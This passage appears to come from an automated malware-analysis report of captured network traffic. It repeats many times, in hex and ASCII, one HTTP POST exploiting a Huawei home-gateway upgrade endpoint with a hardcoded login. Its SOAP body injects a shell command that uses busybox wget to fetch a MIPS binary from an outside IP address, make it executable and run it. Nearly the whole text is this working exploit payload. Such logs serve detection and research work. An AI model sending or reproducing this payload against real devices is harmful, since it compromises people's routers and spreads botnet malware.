65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope 